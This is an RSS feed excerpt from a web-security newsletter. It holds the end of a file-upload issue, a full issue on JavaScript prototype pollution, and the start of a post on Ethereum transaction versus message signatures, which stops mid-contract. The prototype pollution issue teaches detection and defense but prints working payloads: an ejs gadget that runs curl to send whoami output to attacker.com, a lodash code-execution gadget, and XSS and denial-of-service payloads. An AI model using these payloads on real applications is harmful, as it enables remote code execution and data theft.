- **Defense requires layered validation** using extension whitelisting, content validation, file renaming, and storage outside web root
- **Disable execution in upload directories** to prevent webshells from running even if uploaded
- **Image files aren&apos;t always safe** due to ImageTragick, SVG XSS/XXE, and EXIF injection

## 📚 Further Reading

- **[OWASP File Upload Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/File_Upload_Cheat_Sheet.html)**: Comprehensive defense guide with implementation examples
- **[HackTricks File Upload](https://book.hacktricks.wiki/en/pentesting-web/file-upload/index.html)**: Extensive collection of file upload bypass techniques and payloads
- **[PortSwigger File Upload Vulnerabilities](https://portswigger.net/web-security/file-upload)**: In-depth explanation with real-world examples
- **[OWASP Testing for File Upload](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/10-Business_Logic_Testing/09-Test_Upload_of_Malicious_Files)**: Complete testing methodology

---

That&apos;s it for this week! Next issue, we&apos;ll explore **HTTP Request Smuggling**, where we&apos;ll abuse discrepancies between frontend and backend HTTP parsing to bypass security controls, poison caches, and smuggle malicious requests.

If you&apos;re working on a web app with file uploads, take 10 minutes to review your validation logic. Make sure you&apos;re checking file content, not just extensions. Rename files. Store them outside the web root. And for the love of security, never trust user-supplied filenames.

Thanks for reading, and happy hacking 🔐

— Ruben</content:encoded><category>Newsletter</category><category>web-security</category><author>Ruben Santos</author></item><item><title>Prototype Pollution: Hacking JavaScript From the Inside</title><link>https://www.kayssel.com/newsletter/issue-24</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-24</guid><description>How modifying Object.prototype can lead to RCE, XSS, and complete application compromise</description><pubDate>Sun, 16 Nov 2025 09:00:00 GMT</pubDate><content:encoded>## 👋 Introduction

Hey everyone!

Ever wondered how a simple `__proto__` property could compromise an entire Node.js application? Or how attackers turn innocent merge operations into remote code execution?

Prototype Pollution is one of those vulnerabilities that feels like dark magic. It exploits JavaScript&apos;s inheritance mechanism to inject properties into every object in the application. The result? Authentication bypasses, XSS, denial of service, and in the worst cases, full RCE.

Unlike SQL injection or XSS, Prototype Pollution is uniquely JavaScript. It targets the language itself, not just bad input handling. And because JavaScript powers modern APIs, serverless functions, and frontend frameworks, this attack surface is massive.

In this issue, we&apos;ll break down:
- How JavaScript prototypes actually work
- What makes Prototype Pollution possible
- How to detect and exploit it
- Turning pollution into RCE via template engines
- Client-side pollution for XSS
- Real-world CVEs and their impact

If you&apos;re pentesting Node.js apps, REST APIs, or React/Vue/Angular frontends, this is essential knowledge.

Let&apos;s pollute some prototypes 👇

## 🧠 JavaScript Prototypes: The Foundation

Before we exploit prototypes, we need to understand what they are.

### The Prototype Chain

In JavaScript, every object inherits from `Object.prototype`. When you access a property, JavaScript walks up the prototype chain until it finds the property or hits `null`.

```javascript
const user = { name: &quot;Alice&quot; };

console.log(user.name);          // &quot;Alice&quot; (own property)
console.log(user.toString);      // [Function] (inherited from Object.prototype)
console.log(user.nonExistent);   // undefined
```

The chain looks like this:
```
user → Object.prototype → null
```

When you create an object, it automatically links to `Object.prototype` via an internal `[[Prototype]]` property. You can access this via:
- `__proto__` (deprecated but widely supported)
- `Object.getPrototypeOf(obj)`
- `Object.setPrototypeOf(obj, proto)`

### The Danger: Modifying Object.prototype

Here&apos;s where it gets dangerous. If you can inject properties into `Object.prototype`, **every object in the application** inherits them.

```javascript
// Pollute the prototype
Object.prototype.isAdmin = true;

// Now EVERY object has isAdmin
const user = {};
console.log(user.isAdmin);  // true

const config = {};
console.log(config.isAdmin);  // true
```

This is Prototype Pollution. An attacker modifies the base prototype, and suddenly properties appear everywhere.

## 🧨 How Prototype Pollution Happens

Prototype Pollution occurs when applications merge user input into objects without sanitizing property names. The classic vulnerable pattern is recursive merge functions.

### Vulnerable Code: Recursive Merge

```javascript
function merge(target, source) {
  for (let key in source) {
    if (typeof source[key] === &apos;object&apos; &amp;&amp; source[key] !== null) {
      if (!target[key]) target[key] = {};
      merge(target[key], source[key]);  // Recursive merge
    } else {
      target[key] = source[key];
    }
  }
  return target;
}

// Vulnerable usage
const userInput = JSON.parse(req.body);
const config = {};
merge(config, userInput);
```

**The Attack:**

An attacker sends:
```json
{
  &quot;__proto__&quot;: {
    &quot;isAdmin&quot;: true
  }
}
```

When `merge()` processes `__proto__`, it modifies `Object.prototype.isAdmin`. Now **every object** in the application has `isAdmin: true`.

### Why This Works

The key `__proto__` is special. Setting `obj.__proto__` doesn&apos;t create a property on `obj`; it modifies the object&apos;s prototype. So:

```javascript
const obj = {};
obj.__proto__.polluted = &quot;yes&quot;;

const anotherObj = {};
console.log(anotherObj.polluted);  // &quot;yes&quot;
```

The pollution propagates globally.

### Alternative Pollution Vectors

Besides `__proto__`, attackers can use:
- `constructor.prototype` - modifies the constructor&apos;s prototype
- `prototype` (if manipulating constructor functions directly)

```json
{
  &quot;constructor&quot;: {
    &quot;prototype&quot;: {
      &quot;isAdmin&quot;: true
    }
  }
}
```

Both achieve the same goal: inject properties into `Object.prototype`.

## 🔍 Detecting Prototype Pollution

### Manual Detection

Look for:
- **Recursive merge/clone functions** - especially custom implementations
- **Object assignment without property filtering** - `Object.assign()`, `_.merge()`, `$.extend()`
- **JSON parsing into objects** - if the result is merged into configuration
- **Library usage** - older versions of lodash, jQuery, hoek, etc.

### Testing for Pollution

Send payloads like:
```json
{
  &quot;__proto__&quot;: {
    &quot;testPollution&quot;: &quot;vulnerable&quot;
  }
}
```

Then check if the property appears globally:
```javascript
const test = {};
console.log(test.testPollution);  // &quot;vulnerable&quot; = polluted
```

For automated detection tools, see the **Tools of the Trade** section below.

## 💥 Exploitation: From Pollution to Impact

Finding prototype pollution is step one. Weaponizing it requires finding a **gadget**: code that uses the polluted property in a dangerous way.

### 1. Authentication Bypass

```javascript
function isAdmin(user) {
  if (user.isAdmin) {
    return true;
  }
  return false;
}

const user = {};  // No isAdmin property
console.log(isAdmin(user));  // false

// After pollution
Object.prototype.isAdmin = true;
console.log(isAdmin(user));  // true (BYPASSED)
```

**Real-World Example:** Many applications check for privilege flags like `user.role === &apos;admin&apos;`. If the property doesn&apos;t exist, JavaScript checks the prototype. Pollute the prototype with the right value, and you&apos;re admin.

### 2. Remote Code Execution via Template Engines

This is where Prototype Pollution gets truly dangerous. Template engines like **ejs**, **handlebars**, **pug**, and **mustache** often use object properties to configure behavior. Pollute the right property, and you can inject code.

**Example: RCE via ejs (CVE-2022-29078)**

The `ejs` template engine uses `opts.outputFunctionName` to define the function name in compiled templates. If polluted, you can inject arbitrary code.

```javascript
// Pollution payload
{
  &quot;__proto__&quot;: {
    &quot;outputFunctionName&quot;: &quot;x;process.mainModule.require(&apos;child_process&apos;).execSync(&apos;curl attacker.com?data=$(whoami)&apos;);var __output&quot;
  }
}

// When ejs compiles a template, it executes the polluted code
```

**Lodash Template Gadget:**

Lodash&apos;s `_.template()` function is another common RCE vector:

```javascript
// Pollute with malicious sourceURL
{
  &quot;__proto__&quot;: {
    &quot;sourceURL&quot;: &quot;\\n;console.log(process.mainModule.require(&apos;child_process&apos;).execSync(&apos;id&apos;).toString());//&quot;
  }
}
```

### 3. Denial of Service (DoS)

Pollute properties that cause infinite loops or crashes:

```json
{
  &quot;__proto__&quot;: {
    &quot;toString&quot;: &quot;not a function&quot;
  }
}
```

Or pollute with `null` to break property accesses:

```json
{
  &quot;__proto__&quot;: {
    &quot;query&quot;: null
  }
}
```

### 4. Client-Side XSS

In browsers, prototype pollution can lead to XSS if the polluted property is rendered in the DOM.

```javascript
// Vulnerable code
document.getElementById(&apos;output&apos;).innerHTML = obj.userContent || &apos;No content&apos;;

// Pollution payload
{
  &quot;__proto__&quot;: {
    &quot;userContent&quot;: &quot;&lt;img src=x onerror=alert(document.domain)&gt;&quot;
  }
}
```

**DOM Clobbering + Prototype Pollution:**

Combine with [DOM clobbering](https://portswigger.net/web-security/dom-based/dom-clobbering) for more impact:
```html
&lt;form id=&quot;__proto__&quot;&gt;&lt;input name=&quot;isAdmin&quot; value=&quot;true&quot;&gt;&lt;/form&gt;
```

## 🛡️ Real-World CVEs

Major libraries affected by Prototype Pollution:

**Lodash ([CVE-2019-10744](https://nvd.nist.gov/vuln/detail/CVE-2019-10744)):** Versions before 4.17.12 vulnerable in `_.defaultsDeep()`. Critical severity allowing object prototype manipulation.

**Lodash ([CVE-2020-8203](https://nvd.nist.gov/vuln/detail/CVE-2020-8203)):** Versions before 4.17.20 vulnerable in `_.zipObjectDeep()`. CVSS 7.4 HIGH severity.

**ejs ([CVE-2022-29078](https://nvd.nist.gov/vuln/detail/CVE-2022-29078)):** Template engine RCE via `outputFunctionName` pollution. CVSS 9.8 CRITICAL allowing full server compromise.

**jQuery ([CVE-2019-11358](https://nvd.nist.gov/vuln/detail/CVE-2019-11358)):** Versions before 3.4.0 vulnerable in `$.extend(true, ...)`. Can lead to XSS in web applications.

**minimist ([CVE-2020-7598](https://nvd.nist.gov/vuln/detail/CVE-2020-7598)):** Command line argument parser before 1.2.2 allows prototype pollution via constructor payloads.

## 🛠️ Tools of the Trade

**Detection &amp; Exploitation:**
- **[ppmap](https://github.com/kleiton0x00/ppmap)** - Detects and exploits client-side prototype pollution in web applications with automatic gadget fingerprinting and XSS payload generation
- **[DOM Invader](https://portswigger.net/burp/documentation/desktop/tools/dom-invader)** (Burp Suite Pro) - Detects client-side prototype pollution automatically
- **[server-side-prototype-pollution](https://github.com/PortSwigger/server-side-prototype-pollution)** (Burp Extension) - Automates server-side pollution testing
- **[ppfuzz](https://github.com/dwisiswant0/ppfuzz)** - Fast Rust-based fuzzer for client-side prototype pollution that fingerprints script gadgets and generates exploitation payloads

**Static Analysis:**
- **[NodeJsScan](https://github.com/ajinabraham/nodejsscan)** - Static analyzer that detects pollution patterns in Node.js code
- **npm audit** - Detects known vulnerable dependencies
- **[Semgrep](https://semgrep.dev)** - Custom rules for detecting vulnerable merge functions
- **[CodeQL](https://codeql.github.com)** - Queries for prototype pollution patterns
- **[eslint-plugin-security](https://github.com/eslint-community/eslint-plugin-security)** - ESLint plugin that detects some security patterns including prototype pollution

## 🧪 Labs &amp; Practice

**[PortSwigger Web Security Academy](https://portswigger.net/web-security/prototype-pollution)**:
- [Client-side prototype pollution via browser APIs](https://portswigger.net/web-security/prototype-pollution/browser-apis/lab-prototype-pollution-client-side-prototype-pollution-via-browser-apis)
- [DOM XSS via client-side prototype pollution](https://portswigger.net/web-security/prototype-pollution/client-side/lab-prototype-pollution-dom-xss-via-client-side-prototype-pollution)
- [Bypassing flawed input filters for server-side prototype pollution](https://portswigger.net/web-security/prototype-pollution/server-side/lab-bypassing-flawed-input-filters-for-server-side-prototype-pollution)
- [Remote code execution via server-side prototype pollution](https://portswigger.net/web-security/prototype-pollution/server-side/lab-remote-code-execution-via-server-side-prototype-pollution)
- [Privilege escalation via server-side prototype pollution](https://portswigger.net/web-security/prototype-pollution/server-side/lab-privilege-escalation-via-server-side-prototype-pollution)

**[HackTheBox](https://hackthebox.com)**:
- **[Pollution](https://www.hackthebox.com/machines/pollution)**: Hard Linux machine using `constructor.prototype` pollution to achieve privilege escalation and RCE
- **[Gunship](https://app.hackthebox.com/challenges/gunship)**: Web challenge exploiting AST injection in Pug template engine via prototype pollution (easy)
- **[Breaking Grad](https://app.hackthebox.com/challenges/breaking-grad)**: Challenge demonstrating `constructor.prototype` bypass when `__proto__` is filtered (medium)

## 🔒 Mitigation &amp; Defense

**For Developers:**

1. **Freeze prototypes** (breaks pollution entirely):
```javascript
Object.freeze(Object.prototype);
Object.freeze(Object);
```

2. **Use safe alternatives:**
```javascript
// Instead of recursive merge
const config = Object.assign({}, defaults, userInput);

// Or with spread operator
const config = { ...defaults, ...userInput };
```

3. **Filter dangerous keys:**
```javascript
function safeMerge(target, source) {
  const dangerousKeys = [&apos;__proto__&apos;, &apos;constructor&apos;, &apos;prototype&apos;];

  for (let key in source) {
    if (dangerousKeys.includes(key)) continue;

    if (typeof source[key] === &apos;object&apos;) {
      target[key] = safeMerge({}, source[key]);
    } else {
      target[key] = source[key];
    }
  }
  return target;
}
```

4. **Use Map instead of objects:**
```javascript
const config = new Map();
config.set(&apos;key&apos;, &apos;value&apos;);
// No prototype chain to pollute
```

5. **Create objects without prototypes:**
```javascript
const obj = Object.create(null);
// obj.__proto__ is undefined
```

**For Pentesters:**

- Always test recursive merge functions
- Check for gadgets in template engines
- Fuzz with various pollution vectors
- Look for chained vulnerabilities (pollution → gadget → RCE)
- Test both `__proto__` and `constructor.prototype`

## 🎯 Key Takeaways

- **Prototype Pollution exploits JavaScript&apos;s inheritance** by polluting `Object.prototype` to inject properties globally
- **Common in merge/clone functions**, especially recursive implementations
- **Requires a gadget for impact**. Find code that uses the polluted property dangerously
- **RCE is possible** via template engines and eval like constructs as prime targets
- **Client side is exploitable** where DOM manipulation can lead to XSS
- **Mitigation is straightforward** using frozen prototypes, key filtering, or Maps
- **Major libraries were vulnerable**. Always update dependencies

## 📚 Further Reading

- **[PortSwigger Prototype Pollution Research](https://portswigger.net/web-security/prototype-pollution)** - Comprehensive guide covering both client-side and server-side exploitation
- **[Node.js Security Best Practices](https://nodejs.org/en/docs/guides/security/)** - Includes dedicated section on Prototype Pollution (CWE-1321)
- **[Lodash Security Advisories](https://github.com/lodash/lodash/security/advisories)** - Official security advisories for Lodash vulnerabilities
- **[NVD CVE Database](https://nvd.nist.gov/)** - National Vulnerability Database for tracking vulnerability details

---

That&apos;s it for this week! Next issue, we&apos;ll dive into **File Upload Vulnerabilities**, covering everything from bypassing filters to achieving RCE via webshells.

If you found this useful, share it with your team. And if you spot prototype pollution in the wild, let me know. I love hearing about real world finds.

Stay curious, stay secure 🔐

— Ruben</content:encoded><category>Newsletter</category><category>web-security</category><author>Ruben Santos</author></item><item><title>Transaction Signatures vs Message Signatures: Understanding the Difference</title><link>https://www.kayssel.com/post/web3-20</link><guid isPermaLink="true">https://www.kayssel.com/post/web3-20</guid><description>Deep dive into RLP encoding, EIP-191 versioning, and the security differences between on-chain transaction signatures and off-chain message signatures in Ethereum.</description><pubDate>Wed, 12 Nov 2025 09:00:00 GMT</pubDate><content:encoded>## Introduction

Two signature prompts appear in your wallet. One reads &quot;Send 1 ETH to 0x742d...&quot;. The other says &quot;Login to authenticate session.&quot; Both display cryptographic hex strings. Both require your approval.

Question: which one can drain your wallet?

The answer? Either one. Both can be weaponized. But they operate through fundamentally different mechanisms, and that difference is what separates secure dApps from drained wallets.

In the [previous post](/post/web3-19), we covered the cryptographic foundations. ECDSA, secp256k1, the anatomy of r, s, v components. Now we&apos;re cutting deeper into how Ethereum actually processes these signatures. Because transaction signatures and message signatures aren&apos;t just &quot;two types of the same thing.&quot; They&apos;re architecturally distinct, with different encoding schemes, verification flows, and attack surfaces.

Most developers think the ETH prefix we covered earlier solves the cross-contamination problem. It doesn&apos;t. Not completely. Understanding *why* requires dissecting how each signature type gets constructed, transmitted, and verified.

This post will show you:
- RLP encoding: how Ethereum serializes transactions into signable byte arrays
- The complete EIP-191 specification with all three version bytes
- Why smart contracts verify message signatures manually (and what goes wrong)
- The attack patterns that exploit confusion between signature types
- When each signature type is appropriate (and when it&apos;s suicide)

If you&apos;re building anything that touches signatures, wallet integrations, authentication systems, permit functions, meta-transactions, you need this. Because attackers already know these patterns. They&apos;re exploiting them right now.

Let&apos;s start with how Ethereum packages transaction data.

## Transaction Signatures: RLP Encoding Under the Hood

### What Ethereum Actually Signs

When you approve a transaction, you&apos;re not signing &quot;send 1 ETH to Alice.&quot; You&apos;re signing a precisely structured data package with seven mandatory fields that Ethereum nodes need to execute your transaction:

```
nonce       → Transaction counter preventing replays
gasPrice    → Wei per gas unit you&apos;ll pay
gasLimit    → Maximum gas consumption ceiling
to          → Recipient address (20 bytes)
value       → Wei to transfer
data        → Contract calldata or empty bytes
chainId     → Network identifier (1=mainnet, 5=goerli, etc.)
```

Every field matters. Modify one byte, change the nonce from 42 to 43, bump the gasPrice by 1 wei, and you&apos;ve created a completely different transaction with a completely different signature.

But Ethereum nodes can&apos;t process a JavaScript object. They need raw bytes. This is where **RLP encoding** enters.

### RLP: Ethereum&apos;s Serialization Language

RLP (Recursive Length Prefix) is Ethereum&apos;s data packing format, defined in [Appendix B of the Yellow Paper](https://ethereum.github.io/yellowpaper/paper.pdf). It&apos;s how complex nested data structures get flattened into deterministic byte sequences that every node interprets identically.

The [specification](https://ethereum.org/en/developers/docs/data-structures-and-encoding/rlp/) defines encoding rules for two data types:

**Strings** (raw byte sequences):
- Single byte [0x00-0x7f]: The byte is its own encoding
- Strings 0-55 bytes: `[0x80 + length] + data`
- Strings &gt;55 bytes: `[0xb7 + length_of_length] + length + data`

**Lists** (arrays of items):
- Payload 0-55 bytes: `[0xc0 + payload_length] + concatenated_items`
- Payload &gt;55 bytes: `[0xf7 + length_of_length] + payload_length + concatenated_items`

The first byte tells you what follows. Bytes in [0x00-0x7f] are strings. Bytes in [0x80-0xbf] are string encodings. Bytes in [0xc0-0xff] are lists.

**Why does this matter for security?** Because RLP is deterministic. Given identical input, every implementation produces identical output. This means signatures are bound to the *exact* transaction structure. No ambiguity, no interpretation needed.

Let&apos;s see RLP in action:

```javascript
// For RLP encoding in ethers.js v6, use the separate package
// npm install @ethersproject/rlp
const { ethers } = require(&apos;ethers&apos;);
const { encode: encodeRlp } = require(&apos;@ethersproject/rlp&apos;);

// RLP encodes strings by prepending length
function demonstrateRLP() {
  // Short string (&lt; 55 bytes)
  const str = &quot;hello&quot;;
  const strBytes = ethers.toUtf8Bytes(str);
  const encoded = encodeRlp(strBytes);
  console.log(&quot;String:&quot;, str);
  console.log(&quot;RLP encoded:&quot;, encoded);
  // Output: 0x8568656c6c6f
  // Breakdown: 0x85 = (0x80 + 5 byte length), then &quot;hello&quot; in hex

  // List of strings
  const list = [&quot;cat&quot;, &quot;dog&quot;];
  const encodedList = encodeRlp([
    ethers.toUtf8Bytes(list[0]),
    ethers.toUtf8Bytes(list[1])
  ]);
  console.log(&quot;\nList:&quot;, list);
  console.log(&quot;RLP encoded:&quot;, encodedList);
  // Output: 0xc88363617483646f67
  // Breakdown: 0xc8 = (0xc0 + 8 byte payload), then encoded items
}

demonstrateRLP();
```

![](/content/images/2025/11/rlp-encoding.png)

*Output after running the script*

That first byte, 0x85 for the string, 0xc8 for the list, is the RLP prefix. It tells decoders how many bytes follow and what type of data structure to expect.

### How Transactions Get RLP-Encoded and Signed

Here&apos;s the complete flow from transaction parameters to broadcast-ready signature:

![](/content/images/2025/11/rlp-encoding.svg)

*RLP Encoding*

Let&apos;s manually construct and sign a transaction to see RLP encoding in practice:

&lt;details&gt;
&lt;summary&gt;&lt;strong&gt;Click to expand: Complete transaction signing example&lt;/strong&gt;&lt;/summary&gt;

```javascript
const { ethers } = require(&apos;ethers&apos;);

async function manualTransactionSigning() {
  const wallet = ethers.Wallet.createRandom();
  const recipientWallet = ethers.Wallet.createRandom();

  console.log(&quot;Wallet:&quot;, wallet.address);
  console.log(&quot;Private key:&quot;, wallet.privateKey);

  // Transaction parameters for 1 ETH transfer
  const txParams = {
    nonce: 0,
    gasPrice: ethers.parseUnits(&apos;20&apos;, &apos;gwei&apos;),
    gasLimit: 21000,
    to: recipientWallet.address,
    value: ethers.parseEther(&apos;1.0&apos;),
    data: &apos;0x&apos;,
    chainId: 1  // Mainnet
  };

  console.log(&quot;\nTransaction parameters:&quot;);
  console.log(JSON.stringify(txParams, (key, value) =&gt;
    typeof value === &apos;bigint&apos; ? value.toString() : value, 2));

  // Get unsigned serialized transaction (RLP-encoded)
  const unsignedTx = ethers.Transaction.from(txParams).unsignedSerialized;
  console.log(&quot;\nRLP-encoded (unsigned):&quot;, unsignedTx);

  // Hash the RLP-encoded transaction
  const txHash = ethers.keccak256(unsignedTx);
  console.log(&quot;Transaction hash (signed digest):&quot;, txHash);

  // Sign the transaction
  const signedTx = await wallet.signTransaction(txParams);
  console.log(&quot;\nSigned transaction (RLP + signature):&quot;, signedTx);

  // Parse signature components
  const parsedTx = ethers.Transaction.from(signedTx);
  console.log(&quot;\nSignature components:&quot;);
  console.log(&quot;r:&quot;, parsedTx.signature.r);
  console.log(&quot;s:&quot;, parsedTx.signature.s);
  console.log(&quot;v:&quot;, parsedTx.signature.v);

  // Verify signature by recovering signer
  const recoveredSigner = parsedTx.from;
  console.log(&quot;\nRecovered signer:&quot;, recoveredSigner);
  console.log(&quot;Signature valid:&quot;, recoveredSigner === wallet.address);
}

manualTransactionSigning();
```

&lt;/details&gt;

![](/content/images/2025/11/transaction_signing.png)

*Manual transaction*



Notice what happened:
1. **RLP encoding** transformed our transaction object into a deterministic byte array
2. **Keccak-256** hashed that byte array into a 32-byte digest
3. **ECDSA signing** generated r, s, v from the hash and private key
4. **Serialization** combined the original RLP transaction with the signature
5. **Recovery** extracted the signer&apos;s address from the signature

This entire process happens automatically every time you click &quot;Confirm&quot; in your wallet. The signature is cryptographically bound to the RLP-encoded transaction. Change one field, and the signature breaks.

### Built-in Protection Mechanisms

Transaction signatures include two built-in replay protections:

**Nonce**: Each address maintains a transaction counter. Node A with nonce 42 can only execute transaction #42 next. You can&apos;t replay transaction #41 (already executed) or skip to #43 (nonce mismatch). This prevents attackers from rebroadcasting old transactions.

**ChainId**: [EIP-155](https://eips.ethereum.org/EIPS/eip-155) embeds the network identifier into the signature. A transaction signed for Ethereum mainnet (chainId=1) cannot execute on Polygon (chainId=137) or any other network. This prevents cross-chain replay attacks.

These protections are baked into the RLP structure. They&apos;re automatic, mandatory, and verified by every node in the network.

Message signatures have none of this. That&apos;s why they require manual security implementation.

## Message Signatures: EIP-191 and Manual Verification

### Why Message Signatures Exist

Transaction signatures cost gas. They modify blockchain state. They&apos;re permanent.

Sometimes you just need to prove ownership without spending money:
- &quot;Sign in with Ethereum&quot; authentication
- DAO voting (collect signatures off-chain, execute once)
- NFT minting allowlists (prove you&apos;re on the list without paying gas)
- Gasless token approvals (EIP-2612 Permit)

Message signatures serve this purpose. They&apos;re free, off-chain, and can be verified by anyone with the signature and original message.

But unlike transactions, message signatures have no automatic verification. No nodes check them. No built-in replay protection. No mandatory nonce or chainId.

This is where [EIP-191](https://eips.ethereum.org/EIPS/eip-191) enters.

### EIP-191: Structured Signed Data Standard

EIP-191 defines the format for all signed data in Ethereum. The core structure is:

```
0x19 &lt;version byte&gt; &lt;version-specific data&gt; &lt;data to sign&gt;
```

**Why `0x19`?** Because it ensures signed data is not valid RLP. In RLP, single bytes in [0x00-0x7f] are their own encoding. Bytes in [0x80-0xff] are string/list prefixes. The byte `0x19` sits in the single-byte range, which means if RLP-decoded, it would be interpreted as a standalone byte (ASCII value 25), not as the start of a valid transaction structure.

This prevents a signed message from being mistaken for a signed transaction. It&apos;s domain separation at the byte level.

EIP-191 defines three version bytes:

![](/content/images/2025/11/eip-191.svg)

*Eip-191 version bytes*


**Version 0x00 - Data with Intended Validator:**
Format: `0x19 0x00 &lt;validator address&gt; &lt;data&gt;`

Used when a specific smart contract will verify the signature. The validator address (20 bytes) is included in the signed data, binding the signature to that contract. Multisig wallets use this to ensure pre-signed transactions only execute through the intended wallet contract.

**Version 0x01 - Structured Data (EIP-712):**
Format: `0x19 0x01 &lt;domainSeparator&gt; &lt;hashStruct&gt;`

The most sophisticated version. Used for signing typed, structured data like token permits (EIP-2612) and meta-transactions. We&apos;ll cover this in detail in a later post.

**Version 0x45 - Personal Sign:**
Format: `0x19 &apos;Ethereum Signed Message:\n&apos; &lt;length&gt; &lt;message&gt;`

This is what `wallet.signMessage()` uses. The complete prefix is `\x19Ethereum Signed Message:\n` followed by the message length as a string, then the message itself.

&gt;Note: The &quot;version byte 0x45&quot; is not a separate byte. It refers to the ASCII value of &apos;E&apos; in &quot;Ethereum&quot; (0x45 = &apos;E&apos;). The actual format starts with 0x19, then the string &quot;Ethereum...&quot; where &apos;E&apos; happens to be 0x45 in ASCII.

### Demonstrating the Personal Sign Prefix

Let&apos;s see exactly what gets constructed when you sign &quot;Login to dApp&quot;:

&lt;details&gt;
&lt;summary&gt;&lt;strong&gt;Click to expand: EIP-191 prefix construction example&lt;/strong&gt;&lt;/summary&gt;

```javascript
const { ethers } = require(&apos;ethers&apos;);

function demonstrateEIP191PersonalSign() {
  const message = &quot;Login to dApp&quot;;

  console.log(&quot;Original message:&quot;, message);
  console.log(&quot;Message length:&quot;, message.length, &quot;bytes&quot;);

  // EIP-191 version 0x45 construction
  const prefix = &quot;\x19Ethereum Signed Message:\n&quot;;
  const messageBytes = ethers.toUtf8Bytes(message);
  const lengthStr = String(messageBytes.length);
  const lengthBytes = ethers.toUtf8Bytes(lengthStr);

  // Concatenate: prefix + length (as string) + message
  const prefixedMessage = ethers.concat([
    ethers.toUtf8Bytes(prefix),
    lengthBytes,
    messageBytes
  ]);

  console.log(&quot;\nEIP-191 construction:&quot;);
  console.log(&quot;1. Prefix (\\x19Ethereum Signed Message:\\n):&quot;);
  console.log(&quot;   &quot;, ethers.hexlify(ethers.toUtf8Bytes(prefix)));
  console.log(&quot;2. Length (as string &apos;13&apos;):&quot;);
  console.log(&quot;   &quot;, ethers.hexlify(lengthBytes));
  console.log(&quot;3. Message:&quot;);
  console.log(&quot;   &quot;, ethers.hexlify(messageBytes));
  console.log(&quot;\n4. Complete prefixed message:&quot;);
  console.log(&quot;   &quot;, ethers.hexlify(prefixedMessage));

  // Hash the prefixed message (this is what gets signed)
  const messageHash = ethers.keccak256(prefixedMessage);
  console.log(&quot;\n5. Keccak-256 hash (signed digest):&quot;);
  console.log(&quot;   &quot;, messageHash);

  // Verify against ethers.js helper
  const expectedHash = ethers.hashMessage(message);
  console.log(&quot;\n6. ethers.hashMessage() output:&quot;);
  console.log(&quot;   &quot;, expectedHash);
  console.log(&quot;\nMatch:&quot;, messageHash === expectedHash);
}

demonstrateEIP191PersonalSign();
```

&lt;/details&gt;


![](/content/images/2025/11/eip191.png)

*eip-191 prefix construction example*

This prefixed structure is what your private key actually signs. Not just &quot;Login to dApp&quot;, but the entire `0x19 &apos;Ethereum Signed Message:\n13Login to dApp&apos;` byte sequence.

The length is included as a string (&quot;13&quot;), not as a binary number. This means the length field itself varies in size depending on how many digits are needed. A 9-byte message has length &quot;9&quot; (1 byte). A 100-byte message has length &quot;100&quot; (3 bytes).

### Complete Message Signature Flow

Now let&apos;s sign a message and verify it:

&lt;details&gt;
&lt;summary&gt;&lt;strong&gt;Click to expand: Message signature and verification example&lt;/strong&gt;&lt;/summary&gt;

```javascript
const { ethers } = require(&apos;ethers&apos;);

async function completeMessageSignatureFlow() {
  const wallet = ethers.Wallet.createRandom();
  const message = &quot;Authorize withdrawal: 100 USDC&quot;;

  console.log(&quot;=== Message Signature Flow ===\n&quot;);
  console.log(&quot;Signer:&quot;, wallet.address);
  console.log(&quot;Message:&quot;, message);

  // Sign the message (wallet adds EIP-191 prefix automatically)
  const signature = await wallet.signMessage(message);
  console.log(&quot;\nSignature (65 bytes):&quot;, signature);

  // Decompose signature into components
  const sig = ethers.Signature.from(signature);
  console.log(&quot;\nSignature components:&quot;);
  console.log(&quot;r (32 bytes):&quot;, sig.r);
  console.log(&quot;s (32 bytes):&quot;, sig.s);
  console.log(&quot;v (1 byte):&quot;, sig.v);

  // Verify by recovering signer
  const recoveredSigner = ethers.verifyMessage(message, signature);
  console.log(&quot;\n=== Verification ===&quot;);
  console.log(&quot;Expected signer:&quot;, wallet.address);
  console.log(&quot;Recovered signer:&quot;, recoveredSigner);
  console.log(&quot;Valid:&quot;, recoveredSigner === wallet.address);

  // Demonstrate signature-message binding
  const tamperedMessage = &quot;Authorize withdrawal: 1000 USDC&quot;;
  const recoveredFromTampered = ethers.verifyMessage(tamperedMessage, signature);
  console.log(&quot;\n=== Tamper Test ===&quot;);
  console.log(&quot;Tampered message:&quot;, tamperedMessage);
  console.log(&quot;Recovered signer:&quot;, recoveredFromTampered);
  console.log(&quot;Still valid:&quot;, recoveredFromTampered === wallet.address);
}

completeMessageSignatureFlow();
```

&lt;/details&gt;


![](/content/images/2025/11/sign-verification.png)

*Message Signature Verification Example*

Key observation: when we changed &quot;100 USDC&quot; to &quot;1000 USDC&quot;, the recovered address changed completely. The signature is cryptographically bound to the exact message. You cannot modify the message and reuse the signature.

But here&apos;s the dangerous part: **nothing prevents the signature from being reused with the original message**. If the verifying contract doesn&apos;t implement replay protection (nonces, deadlines, single-use flags), an attacker can submit the same signature repeatedly.

This is the fundamental difference from transaction signatures, which have mandatory nonce protection.

## Smart Contract Verification: On-Chain Implementation

### Complete Signature Verification Contract

Let&apos;s build a contract that verifies EIP-191 personal sign messages with proper security controls:

&lt;details&gt;
&lt;summary&gt;&lt;strong&gt;Click to expand: Complete SignatureVerifier contract (207 lines)&lt;/strong&gt;&lt;/summary&gt;

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

/**
 * @title SignatureVerifier
 * @notice Demonstrates secure message signature verification
 * @dev Implements EIP-191 version 0x45 (personal_sign) verification with replay protection
 */
contract SignatureVerifier {
    // SECURITY: Nonce tracking prevents replay attacks
    mapping(address =&gt; uint256) public nonces;

    // SECURITY: Track used signatures to prevent reuse
    mapping(bytes32 =&gt; bool) public usedSignatures;

    /**
     * @notice Verify an EIP-191 personal_sign message signature
     * @param message The original message that was signed
     * @param signature The 65-byte ECDSA signature (r + s + v)
     * @param expectedSigner The address that should have signed
     * @return bool True if signature is valid and from expected signer
     */
    function verifyPersonalSign(
        string memory message,
        bytes memory signature,
        address expectedSigner
    ) public pure returns (bool) {
        // Reconstruct the EIP-191 prefixed message hash
        // Format: &quot;\x19Ethereum Signed Message:\n&quot; + len(message) + message
        bytes32 messageHash = getEthSignedMessageHash(message);

        // Recover signer from signature
        address recoveredSigner = recoverSigner(messageHash, signature);

        // SECURITY: Verify recovered signer matches expected
        return recoveredSigner == expectedSigner;
    }

    /**
